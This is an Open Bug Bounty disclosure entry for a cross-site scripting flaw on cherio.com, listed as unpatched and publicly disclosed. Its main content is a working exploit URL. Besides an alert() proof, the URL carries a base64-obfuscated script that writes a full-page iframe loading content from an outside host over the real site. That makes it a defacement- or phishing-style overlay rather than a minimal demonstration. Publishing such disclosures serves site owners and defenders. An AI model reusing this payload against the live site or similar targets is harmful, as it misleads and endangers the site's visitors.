cherio.com XSS vulnerability

2015-07-08T11:53:00
ID OBB:70529
Type openbugbounty
Reporter sToRm
Modified 2015-07-08T11:55:00

Description

Vulnerable URL:
http://www.cherio.com/backoffice/service/V3/cherio.php/1%22%3E%3C/a%3E%3C/div%3E%3Cscript%3Ealert%28%22XSSPOSED%22%29;document.write%28atob%28%27PGlmcmFtZSBzdHlsZT0icG9zaXRpb246Zml4ZWQ7dG9wOjA7bGVmdDowO3dpZHRoOjEwMCU7bWluLWhlaWdodDoxMDAwcHg7aGVpZ2h0OjEwMCU7Ym9yZGVyOm5vbmU7ei1pbmRleDo5OTkiIHNyYz0iaHR0cDovL3d3dy5zaWNoZXJoZWl0LW9ubGluZS5vcmcveHRlcm5hbC9zdG9ybS5odG1sIj48L2lmcmFtZT4=%27%29%29;%3C/script%3E%3C!--
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 25.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| Unknown / Not calculated
Google Pagerank:| 1
VIP website status:| No
cherio.com SSL connection:| Grade: F

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 8 July, 2015 11:53 GMT
Vulnerability existence verified and confirmed| 8 July, 2015 11:55 GMT